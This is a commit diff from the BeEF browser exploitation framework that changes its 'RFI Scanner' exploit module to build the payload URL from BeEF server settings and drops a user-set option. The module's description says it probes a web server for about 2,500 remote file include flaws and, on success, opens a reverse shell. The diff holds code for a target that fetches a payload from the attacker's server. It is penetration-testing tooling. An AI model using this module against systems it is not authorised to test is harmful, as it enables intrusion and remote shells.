remove payload url

2015-01-20 12:18:50 +00:00
parent a168274e7e
commit 1318ccf019
4 changed files with 3 additions and 8 deletions
--- a/modules/exploits/rfi_scanner/command.js
+++ b/modules/exploits/rfi_scanner/command.js
@@ -10,7 +10,7 @@ beef.execute(function() {
  var rhost = '<%= @rhost %>'; 
  var rport = '<%= @rport %>';
  var base_dir = '<%= @base_dir %>';
-  var payload_url = '<%= @payload_url %>/rfi_php_<%= @command_id %>.txt?';
+  var payload_url = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/rfi_php_<%= @command_id %>.txt?';
  var target = rproto + '://' + rhost + ':' + rport + base_dir;
  var wait = '<%= @wait %>';

--- a/modules/exploits/rfi_scanner/config.yaml
+++ b/modules/exploits/rfi_scanner/config.yaml
@@ -9,7 +9,7 @@ beef:
            enable: true
            category: "Exploits"
            name: "RFI Scanner"
-            description: "This module scans the specified web server for ~2,500 remote file include vulnerabilities using the <a href='https://code.google.com/p/fuzzdb/'>fuzzdb</a> <a href='https://fuzzdb.googlecode.com/svn/trunk/attack-payloads/rfi/rfi.txt'>RFI list</a>. Many of these vulns require the target to have register_globals enabled in the PHP config.<br/><br/>The scan will take about 10 minutes with the default settings. Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local port specified below.</br><br/>This module mounts the payload on the BeEF server. Be sure to specify the BeEF server URL below for the target server to connect to."
+            description: "This module scans the specified web server for ~2,500 remote file include vulnerabilities using the <a href='https://code.google.com/p/fuzzdb/'>fuzzdb</a> <a href='https://fuzzdb.googlecode.com/svn/trunk/attack-payloads/rfi/rfi.txt'>RFI list</a>. Many of these vulns require the target to have register_globals enabled in the PHP config.<br/><br/>The scan will take about 10 minutes with the default settings. Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local port specified below."
            authors: ["bcoles"]
            target:
                working: ["ALL"]
--- a/modules/exploits/rfi_scanner/module.rb
+++ b/modules/exploits/rfi_scanner/module.rb
@@ -149,11 +149,8 @@ EOS
  
 	def self.options
 		configuration = BeEF::Core::Configuration.instance
-		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
-		beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
                lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
                lhost = "" if lhost == "0.0.0.0"
-		url = "#{proto}://#{lhost}:#{beef_port}"
 		return [
 			{ 'name' => 'rproto',
 				'type' => 'combobox',
@@ -173,7 +170,6 @@ EOS
 			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' }, 
 			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
 			{ 'name' => 'base_dir', 'ui_label' => 'Base Directory', 'value' => '/' },
-			{ 'name' => 'payload_url', 'ui_label' => 'BeEF server URL',  'value' => url },
 			{ 'name' => 'payload',
 				'type' => 'combobox',
 				'ui_label' => 'Payload',